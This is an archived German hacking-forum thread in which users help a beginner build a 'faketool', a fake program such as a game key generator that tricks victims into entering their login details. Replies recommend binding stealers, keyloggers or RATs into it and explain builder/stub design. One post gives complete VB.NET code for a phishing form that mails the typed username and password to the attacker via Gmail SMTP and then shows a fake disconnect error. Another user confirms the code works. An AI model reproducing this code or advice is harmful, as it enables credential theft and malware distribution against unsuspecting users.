PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Suche faketool selbermachen tut!



_EazyE
16.03.2010, 09:46
hallo free-hack community!

suche dringend jemanden der mir ein tutorial gibt, wie man ein faketool selber machen kann. habe nichts in der richtung gefunden.

kann mir nicht vorstellen das, ein faketool selber zu machen, besonders schwer ist.
habe auch geringe fähigkeiten in sachen html und css.

könnte man nich theoretisch mal ein faketool maker erstellen, den der einzelne user dann individuel bearbeiten kann?
also im grunde isses ja nur ein fenster mit text und bildern.
man könnte es doch so einstellen, das es ein tool-maker gibt, bei dem man den text selber eingeben kann, selber die bilder hinzufügen kann, etc.
und dieses tool erstellt dann das "fast-selbst" kreirte faketool...

die vorgegebenen fake tools sind ja schließlich alle die gleichen, ziemlich alt, und was die kreativität gewisser faketools angeht, geht da bei manchen sicherlich auch noch einiges^^
...was meint ihr dazu?!....:surprised

Hu5eL
16.03.2010, 09:52
was ist ein "fake-tool"?
wieso sollten diese kreativ sein? Das Design ist doch furz egal, hauptsache es funzt.

Um Bsp. Accounts zu faken benötigst du ja eventuell Paypal-Accounts, Kreditkarten-nummern oder so...
wenn du etwas php könntest, würdest du wissen, dass das automatisieren von fake-vorgängen geht, aber nicht verallgemeinern lässt.

0x30
16.03.2010, 10:59
kann mir nicht vorstellen das, ein faketool selber zu machen, besonders schwer ist.
Wenn es nicht so schwer ist, wieso zeigst du dann nicht ein bisschen Eigeninitiative und versuchst es selbst zu machen?

_EazyE
16.03.2010, 11:46
und versuchst es selbst zu machen?wonnach fragich denn in diesem thread *rolleyes*
immer diese geilen beiträge um seine posts zu steigern....


was ist ein "fake-tool"?
wieso sollten diese kreativ sein? Das Design ist doch furz egal, hauptsache es funzt.auch son hammer beitrag...erst fragen was es is, und dann sagen das design egal is..omg ey

wenn ihr mir kein tutorial liefern könnt, braucht ihr auch nich schreiben odeR? beide beiträge einfach nur mega unnötiq und absolut irrelevant...
sry aber sowas geht mir echt auf die eier

Hu5eL
16.03.2010, 11:51
lol ^^. vermutlich keine programmier-kenntnisse und dann sagen "ist doch nicht so schwer, aber macht ihr mal".
ich glaube das dir so keiner helfen wird. ich habe doch gesagt. was ist an nem faker-tool "kreativ". daran ist nichts kreativ, außer das design.
deswegen sag doch einfach mal, was du unter "fake-took" verstehst. fü micht ist ein fake tool dazu da, um auf seiten fake-account zu erstellen für z.b rs, ul o.ä

könntest aber auch sowas wie nen perso-gen meinen.

mbeezy
16.03.2010, 12:02
Vielleicht meint er ja auch sowas? http://free-hack.com/showthread.php?goto=newpost&t=50719

Nur so eine Idee... nfc.

_EazyE
16.03.2010, 12:36
Vielleicht meint er ja auch sowas? http://free-hack.com/showthread.php?...ewpost&t=50719 (http://free-hack.com/showthread.php?goto=newpost&t=50719)

HAHAAHAHAHAH XDDDDDDDDDD
ja genau das meintich :D:D:D

wenn ihr natürlich alle nich wusstet was ich meine, sry meinerseits

Hu5eL
16.03.2010, 12:38
omg jetzt versteh ich wasn für dich fake-tools sind ^^

_EazyE
16.03.2010, 13:34
lol na kla! ;)
das meinich jetz aber ernst ne?
hat jmd ein tutorial dafür zum selber machen?!

sp33dwalker
16.03.2010, 13:46
Nix da tutorial, ran an visual basic und selbst zusammenklicken^^ Sowas is easy.Mach dich halt bisschen mit der IDE vertraut

drumerluke
16.03.2010, 13:53
ich würd' mal ganz stark sehen: siehe Steal0r, den mussu denn nur noch in ein 1-hack Tool einfügen , also eben mit C+ sonn dingens schreiben...

_EazyE
16.03.2010, 13:54
ja rofl ich hab kein plan wovon ihr da redet :D
klingt wie fach chinesisch
C+, virtual basic, IDE ???
soll ich das jetz alles selber googlen oder watt...

drumerluke
16.03.2010, 13:58
öhhhm....... JA! SuFu steal0r/stealer und google Microsoft Visual Studio, damit macht man solche "Fenster" in dem du den steal0r einbauen kannst, oder, wenn der jenige sein PW eingeben soll und du das bekommst, massu das einfach mit nem Keylogger und auch eben nem FTP server, allgemein, würde ich das aber nicht machen, da nja kann leicht gesnifft werden!

houston
16.03.2010, 13:58
Ich gebe da sp33dwalker recht.

Diese kleinen Tools sind besonders gut zum lernen geeignet.
Daran kann man seine Kreativität und sein Programmierer-Können dran testen.
Die einfachen bestehen aus 2 Textboxen, einem button, und einer email die versand wird (wenn ich das Fake-Tool richtig interpretiere, der Link oben ist ja nicht mehr aktuell).

Darum wird es auch kaum etwas bringen, wenn man ein Variable erstellbares Tool schreibt. Außer halt zur eigenen Belehrung in der Sprache.
Für den Eigengebrauch reicht es ja einfach das Design bischen neu zusammen zu schieben, und dann zu kompilieren.

Mit html und Css kommste da nicht weit ;)

Barny
16.03.2010, 14:33
Sowas kann man auch in Delphi machen, was nicht sonderlich schwer ist.
Die Kentnisse dafür kriegt man auch hier ausm Board, einfach ma in der Delphi-Section gucken habe da schonmal was gesehen. ;)

Und da dann einfach nen Rat dranhängen und irgendwo hochladen.

mfg

Barny

//Edit: Habe hier vielleicht noch etwas interessantes gefunden: http://free-hack.com/showthread.php?t=42449&highlight=Hoster
Bin ich gerade durch Zufall drauf gestoßen^^

_EazyE
17.03.2010, 12:17
danke für eure hilfe :)
dann werdich ma gucken. barny den link den du gepostet hast, is nich genau das was ich wollte ;)
aber drumerluke hat schon richtig erkannt worum hier geht :D
will nämlich selber solche fenster erstellen und so, bei diesem fake tool generator, werden ja nur schon "vorlagen" erstellt :)
trotzdem danke an alle!
werd dann ma microsoft visual studio googlen ;D

drumerluke
17.03.2010, 15:02
ja sach' ich doch!! :D musst die free version also basic nehmen!

Slawa
17.03.2010, 15:14
Hey, das Problem ist, dass du dich für eine bestimmte Programmiersprache entscheiden musst, VB.NET, C#, c++, Delphi, Java, PHP usw.

Ich persönlich würde dir VB.NET empfehlen, dass ist fast selbsterklärend und sehr einfach, naja am Anfang zumindest ist es schwer.

Einen Phishing Tool zu coden, dauert höchstens 3 Min. aber wenn du einen Builder haben möchtest, wird es etwas schwerer, da du eine Stub brauchst und die Daten aus dem Builder an die Stub anhängen musst (--> Erray erstellen).

Wenn du willst, kann ich dir mal dabei helfen, wäre kein Problem, aber du solltest wirklich die Grundlagen lernen, damit du die Funktionsweise richtig verstehst, den Code musst du natürlich auch richtig verstehen. :)


Gruß

Slawa

_EazyE
18.03.2010, 16:21
so erste ergebnisse :D
YouTube- BETA KEY STARCRAFT 2 KEY-GENERATOR v1.4 TUTORIAL !!! + DOWNLOADLINK [Part 2]

drumerluke
18.03.2010, 16:34
guut guut!

kleiner fehler, du sagst,e s sind keys, die lange net benutzt wurden, doch beim anmelden steht denn zuletzt benutzt 18. March nja das solltest ma iwie ändern xD

_EazyE
18.03.2010, 17:22
LOL :D gut beobachtet!
lol drumerluke, sniff versuch :D ??

aber danke für den kommentar :)

drumerluke
18.03.2010, 20:39
ja klarr :D KD aber dafür mussu mir sagen, wie du das gemacht hast.... mit dem unsniffbar teil.....

HTC
18.03.2010, 22:33
grüße dich @_EazyE (http://free-hack.com/member.php?u=46283)!

Mach doch eins mit VB.net (visual basic 2008 ) ich geb dir mal nen code aber den raffst du nur wenn du dich vertraut machst mach dein eigenen Style aber setze ihn hier am besten nicht rein (den style,weil es hier nur neidische kiddis gibt. ) und postet bloß jetzt keine dummen AW ich ignoriere sie eh alle !!! ( bug me not ! ) is ein phishing Tool in dem Fall.




Imports System.Net.Mail
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("FRAGEZEICHEN@googlemail.com", "dein Passwort")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.googlemail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("FRAGEZEICHEN@googlemail.com")
mail.To.Add("FRAGEZEICHEN@googlemail.com")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
Timer1.Start()
If TextBox2.Text = "" Then
Timer1.Stop()
If TextBox2.Text = "" Then
ProgressBar1.Value = 0
End If
End If
If TextBox1.Text = "" Then
Timer1.Stop()
If TextBox1.Text = "" Then
ProgressBar1.Value = 0
End If
End If
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
End If
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
End If
End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
ProgressBar1.Increment(1)

If ProgressBar1.Value = ProgressBar1.Maximum Then
Timer1.Stop()
ProgressBar1.Value = 0
MsgBox("Disconnected From Server, Please try again later!")
End If
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Me.Close()
End Sub
End Class

Slawa
19.03.2010, 05:35
Ja das funktioniert, als ich mit VB.NT angefangen habe, habe ich das erste mal den Code benutzt und heute benutz ich den fast auch, sogar sehr oft.

Gruß

Slawa